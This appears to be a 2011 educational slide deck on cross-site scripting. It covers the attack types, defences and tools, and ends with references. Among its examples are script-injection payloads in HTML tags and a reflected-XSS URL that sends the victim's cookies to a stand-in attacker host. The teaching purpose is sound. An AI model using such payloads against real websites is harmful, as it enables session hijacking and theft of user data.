Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Web Design

XSS2

advertisement 
Ashish Dhital
21st April 2011

Web sites are ubiquitous today

Immense popularity brings variety of attacks

Mostly SQL Injection, DoS, XSS

XSS introduction, types, defense and
conclusion







XSS exploits websites by inserting malicious client
side scripts in dynamic websites
Making use of browser’s vulnerabilities
Bypassing same origin policy enforced by browser
Exploitation of HTML, JS, VBScript, ActiveX
Objective – session hijacking, redirection, stealing
information
80% of Attacks against Websites today
In 2010, various XSS vulnerabilities were found in
Amazon, eBay, PayPal, American Express
McAfee’s site has been shown to have XSS
vulnerabilities (as of March 2011)

Examples of Insertion of Scripts in HTML tags
<BODY ONLOAD =alert (“evilmessage”) />
<IMG SR =”Javascript: alert (“evilmessage”) />
<LINK REL=”STYLESHEET” HREF=”Javscript.alert
(“evilmessage”) />
Flash Exploitation
<EMBED SRC= http://dangeroussite.com/evilflash.swf “
AllowScriptAccess=”always” />


DOM Based Attack

Reflected / Non- persistent Attack

Stored/ Persistent Attack


Exploitation of DOM Entities
document. Location, document.URL, and
document.referer properties
Payload in the URL sent to unsuspecting users
http://www.genuinewebsite.com/getAC.php?userna
me=<script>alert (“harmful script”) </script>

Unexpected/Undesired execution of client-side script




Most common form of XSS attack
Data provided by web-client is immediately used
by web-server to relay back a resulting page
Confirmation, Error , Search queries
Usually a malicious link provided by social
engineering techniques
Ex.
http://www.genuinesite.com/getAc.php?userna
me=<script>document.location='http://attackersit
e.ample/cgibin/stolencookie.cgi?'+document.cook
ie)</script>




Most powerful one in terms of the possible
damage
Inserting a malicious code into a form or input
field which is stored in the server
Could infect other users, web-server, propagate
rapidly
Example:
The attacker inserts a script as a blog post (Of
course the input text is not filtered or sanitized).
A user who visits the site later clicks on the blog
post. And, the script executes!
Possible worm?



User Input Validation / Sanitization, Parameter
Verification
Careful Checking HTTP Request to HTML Output
Filtering out unnecessary characters using regular
expression
Example: Filtering out anything that starts with
<script>


Data verification for various properties of
HTML tags like attribute, style, width
Cookies Protection
Cookie – holds information about the surfer
IP Address Verification ( Effective for Proxy
Server ? )
HTTPOnly Flag
Possible Solution – Triple DES Encryption

Available Tools to Minimize XSS attack
Noxes : Windows based firewall
Configuration for browser based
connections
Samurai
XJs

How can a user defend oneself from XSS
attacks?
Disabling script when not required.
Avoid clicking on unknown sites, URLs, or
message boards.
Accessing a site through its own address and
not through third-party sites.
Keeping oneself updated about sites and
message boards that have been blacklisted as
malicious sites.




Preventive Steps May work for vulnerabilities
known today
Hackers are always at work to discover zero
day vulnerabilities
Web Development team should constantly
update themselves
Security is an ongoing process!







Bodmer, Fabrice. Cross-Site Scripting (XSS). Tech. Computer and Network Security Seminar. Web. 12
Apr. 2011.
<http://diuf.unifr.ch/drupal/tns/sites/diuf.unifr.ch.drupal.tns/files/Teaching/2006_2007/Comput
er_Security_Threats_and_Counter_Measures/Bodmer_CrossSiteScripting.pdf>.
Kirda, Engin, Christopher Kruegel, Giovanni Vigna, and Nenad Jovanovic. Noxes: A Client-Side
Solution for Mitigating Cross-Site Scripting Attacks. Noxes: A Client-Side Solution for Mitigating Cross-Site
Scripting Attacks. Web. 12 Apr. 2011.
<http://www.cs.ucsb.edu/~vigna/publications/2006_kirda_kruegel_vigna_jovanovic_SAC.pdf>.
Mohammadi, S., and Farhad Koohbor. Protecting Cookies against Cross-site Scripting Attacks Using
Cryptography. Http://www.wseas.us. Web. 12 Apr. 2011. <http://www.wseas.us/elibrary/conferences/2010/Merida/ISPACT/ISPACT-02.pdf>.
Sharma, Anand. "Prevent a Cross-Site Scripting Attack." IBM - United States. IBM, 03 Feb. 2004. Web.
12 Apr. 2011. <http://www.ibm.com/developerworks/web/library/wa-secxss/>.
Cross-site Scripting (XSS) - OWASP." OWASP (Open Web Application Security Project). Fortify Software,
10 Oct. 2010. Web. 16 Apr. 2011. <https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)>.
"Cross-site Scripting." Wikipedia, the Free Encyclopedia. Web. 17 Apr. 2011.
<http://en.wikipedia.org/wiki/Cross-site_scripting>.
XSSed | Cross Site Scripting (XSS) Attacks Information and Archive. Web. 17 Apr. 2011.
<http://www.xssed.com/>.
Related documents
Powerpoint Slides
Powerpoint Slides
n0072T_xss - IEEE Standards Working Group Areas
n0072T_xss - IEEE Standards Working Group Areas
presentation - Institute for Security Technology Studies (ISTS)
presentation - Institute for Security Technology Studies (ISTS)
Origins, Cookies and Security * Oh My!
Origins, Cookies and Security * Oh My!
PPT - CCSS
PPT - CCSS
Damn Vulnerable web application
Damn Vulnerable web application
XSS Finder for Web Application Security
XSS Finder for Web Application Security
網頁應用程式的安全入門
網頁應用程式的安全入門
www.ijecs.in International Journal Of Engineering And Computer Science ISSN:2319-7242
www.ijecs.in International Journal Of Engineering And Computer Science ISSN:2319-7242
Secure Web Applications Against Cross Site Scripting XSS A Review
Secure Web Applications Against Cross Site Scripting XSS A Review
IRJET-A Survey on Various Cross-Site Scripting Attacks and Few Prevention Approaches along with a Conducive Approach
IRJET-A Survey on Various Cross-Site Scripting Attacks and Few Prevention Approaches along with a Conducive Approach
en-m-wikipedia-org-wiki-Cross-site scripting
en-m-wikipedia-org-wiki-Cross-site scripting
Document14120697 14120697
Document14120697 14120697
Automatic Creation of SQL Injection and Cross-Site Scripting Attacks Technical Report
Automatic Creation of SQL Injection and Cross-Site Scripting Attacks Technical Report
Download
advertisement